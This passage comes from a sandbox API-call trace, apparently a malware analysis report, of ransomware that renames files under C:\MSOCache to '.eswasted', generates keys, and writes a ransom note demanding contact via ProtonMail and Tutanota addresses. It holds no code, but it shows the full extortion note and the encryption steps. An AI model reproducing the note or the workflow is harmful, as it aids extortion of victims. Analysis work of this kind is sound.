"c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.eswasted")) returned 1 [0071.498] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.498] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0071.498] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x251f [0071.498] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x251f) returned 0x330000 [0071.499] CloseHandle (hObject=0x128) returned 1 [0071.502] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.502] CloseHandle (hObject=0x130) returned 1 [0071.502] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.502] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.503] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.503] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.503] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.504] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.504] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.513] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1312620 [0071.513] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.513] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.513] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]TRL+ryCer7h12qgAyObR6OiHoNqeekYZM4FyVafGvrp+2kSreMG3rg/aECbelc/j\r\n9FHICNLmVsOWs51ILhv/jq6N4WwInMr//UD73ZTDj6Q8zZJqH8aetZ6zwWiBNT3V\r\nCNMMBQPCb6FnVNDZgW6Sl7QFSV3d7Xmb17vL/wzuJtZjCbrOvBLNF7n+xXZz0gSI\r\n0KD2uVAR3QWa1eD9xhfC42zMfJt+DPfH5Eo/gVTmbNyRsn0taptnmluj1Y4wW5QW\r\nv9+O4ty4ClyeCHDjPDu+jwBYLu1foUz/eDGpwkpySDuYpfNyXDeK6krB9r4l1KzR\r\n91PH3OEqNgsfBZ9ZPec6zSCWI+YkDJjp1FwSqNCf1lTDtHrLx/FSZ093OMqp3fwa\r\nKG1Hor7GqyLmy8xSlgktds4deMuHJIylVek1lC27bLmNnDIeBD1TtIXddQXXjx85\r\n9N1DBMdQxdaog1g+A7KCjy/3FVquXO1+Nvxz1uwtb3BtaYu/cIqChXOc9qBug0Dz\r\n5bL5HKaWLRqUCdsbBlIQscTV2MhXkoA5DMRa+BtO9gn04wIotQm7bkjUm4FoHh/8\r\ntYx36tAo1QtyLPPhVKMu4T4Ay/76XFwLDjXFLFTAbzEYBNdNpsV9d193uGB863D/\r\nbfQsYkPtR0RlRG9HULSfyxPs+HyiWOaDoBWWO/32qbX=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.513] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312620 | out: hHeap=0x6d0000) returned 1 [0071.513] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.513] SetEndOfFile (hFile=0x11c) returned 1 [0071.516] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.516] CloseHandle (hObject=0x11c) returned 1 [0071.517] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.517] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0071.517] _aulldvrm () returned 0x0 [0071.517] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.518] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.518] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.518] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0071.518] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x70b630 [0071.518] lstrcpyW (in: lpString1=0x70b6d2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.518] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.518] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.519] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0071.519] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.519] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.520] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.521] SetEndOfFile (hFile=0x11c) returned 1 [0071.521] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.521] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.522] lstrcpyW (in: lpString1=0x70b6d2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.eswasted")) returned 1 [0071.522] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.522] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.522] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x646 [0071.522] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x646) returned 0x330000 [0071.523] CloseHandle (hObject=0x130) returned 1 [0071.525] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.525] CloseHandle (hObject=0x128) returned 1 [0071.525] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.525] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.526] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.526] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.526] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.527] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.527] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.537] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1312878 [0071.537] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.537] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.537] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GhmGZ5vr0pn98MC+8E11wnCTZ4rsIxudEUng6ARN5nAs/R973tSfwMnkdKaOY5Zf\r\n8wsPk8YlhE/qFvPBjnUPFqcol4/4JZI3l8Pii2uItZA2fMZvTKVS2/6yZl1T8kiK\r\nRAMYbIDhA9kR7h6h5j74qSv7wgppoKJQRTqw/0Vy8lDYEkuvJPes/8BmNw8EaMs2\r\n9vOrYOGT5uYeVGrpaZTQ9MXlvRP8GavE2xinrzVGm/nW6EhhcyZSvcZI8RyGXEin\r\nj3mZ0tATE8p6/4Gk5J18TZ605M9mQrjNNQ99ju3FzstDNThBojJXu1iqP32Jfhvc\r\nPshVpc6iKSpNkJrIaI7cCNzE11deBu5e1X8QPK4sREEDX51bcIxcqJHc+RMKF3b7\r\n03EDru/xydLgbh/Mu9Fu6k2b2QymrCFz1jEMLVjDaS5CyzvQ/emzf7D2tkSM2SZS\r\nPZ2H41RsWpePolKM/5uaQZeeRXK9+GixXLEphbOoq4r1mSh43Jg1+kdWeIhRMjgX\r\nh+lIZNSi1V60cJ0NbN4Hpa4NbZ9QKPB/KJThp+IcFZIVPfKI+a2+404zh8lvq/nb\r\nclL6i3VA9GdP6mUs+vuvRugC4DTwDWeDb2P3BcdPTe4y3odzAcMyDzc6CTBak5a1\r\n+NimAs5CiepKeUYrTprJEFSlw2SxOF2oZo88kF2ijKi=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.537] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312878 | out: hHeap=0x6d0000) returned 1 [0071.537] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.537] SetEndOfFile (hFile=0x11c) returned 1 [0071.539] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.539] CloseHandle (hObject=0x11c) returned 1 [0071.541] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.541] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0071.541] _aulldvrm () returned 0x0 [0071.541] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.542] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.542] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.542] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.542] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b630 [0071.542] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.542] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.542] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.543] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0071.543] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.543] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.544] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.545] SetEndOfFile (hFile=0x11c) returned 1 [0071.545] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.545] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.545] lstrcpyW (in: lpString1=0x70b6c8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.548] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.548] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0071.548] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x7c4 [0071.548] MapViewOfFile (hFileMappingObject=0x134, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c4) returned 0x330000 [0071.548] CloseHandle (hObject=0x130) returned 1 [0071.551] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.551] CloseHandle (hObject=0x134) returned 1 [0071.551] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.551] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.552] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.552] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.552] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.552] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.553] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1312878 [0071.561] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.561] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.561] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ZDA9dxw0TgDRUiwJs6t+QQHCK/2qbI6mPfBILzynHw8rr9NOEfpK0lEF8VIv0UoO\r\nJd125Hy5RI5BE/y7laW+M14xTV2E1f4bnjJrWe/ZkMUfpeRwr6fIBBJH1OqKUnPA\r\nXXnsK5oF0wDycazFO0AP7EYBM4fR2JZcuY+IgSQp3AXL7xMJWRaeRumVPXERzAgV\r\nJTuUOnBbap9Ivf4LSvfPszaY5Wj627wosq68WBXMrtPHDmdAPseigYq5GbdrZf0K\r\ngJek35t357iPfOgBKrFBtgA8CAYJ4qdNwxbOcHbq4KiWD1lY+kiIBxKZlhUmrqXT\r\nK3IA/u7LvhZdoAnJmW6Lr7A/WvKVsS0WWRkNUbY5HYlW1m6Oq2zvBTd4W8uPHep0\r\n47nHUOhO7nR1ZcI7ifVS2JWIV8Rvf7H2o0kchkOdMWKkcdIztQhAcvlG64wFx5E1\r\nTGJ5OWheQBCQBCqa+e9fOBH1/eKQDCVdtmy4du9RIjYVuu902VGwbbcjjh7WLsTn\r\nr0z1mpZc2NkL+2tZZsJslRa9y6Ttwsk0BgEeUJDsm0KyeYI6+j0oB0CFn6xSmYFm\r\ngzH8Xt/FOx0ke9AgNWHDhhlCdDw74FEAwjSAAZ2zXXGr3mWbOHprykWL+ijvS5Ok\r\n5Uq5mfZmwNnGIJxK4CdoMaKigJdmSrrjV/k5Op0Vieo=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.561] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312878 | out: hHeap=0x6d0000) returned 1 [0071.561] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.561] SetEndOfFile (hFile=0x11c) returned 1 [0071.563] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.563] CloseHandle (hObject=0x11c) returned 1 [0071.564] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.565] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312148 | out: hHeap=0x6d0000) returned 1 [0071.565] _aulldvrm () returned 0x0 [0071.565] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.565] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.565] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.565] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0071.565] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x70b630 [0071.566] lstrcpyW (in: lpString1=0x70b6d2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.566] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.566] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.566] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0071.566] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.566] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.567] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.568] SetEndOfFile (hFile=0x11c) returned 1 [0071.569] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.569] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.569] lstrcpyW (in: lpString1=0x70b6d2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.eswasted")) returned 1 [0071.573] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.573] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.574] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x5ac [0071.574] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0x330000 [0071.574] CloseHandle (hObject=0x124) returned 1 [0071.576] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.576] CloseHandle (hObject=0x128) returned 1 [0071.576] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.576] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.577] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.577] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.577] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.578] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.578] CryptReleaseContext (hProv=0x70f058, 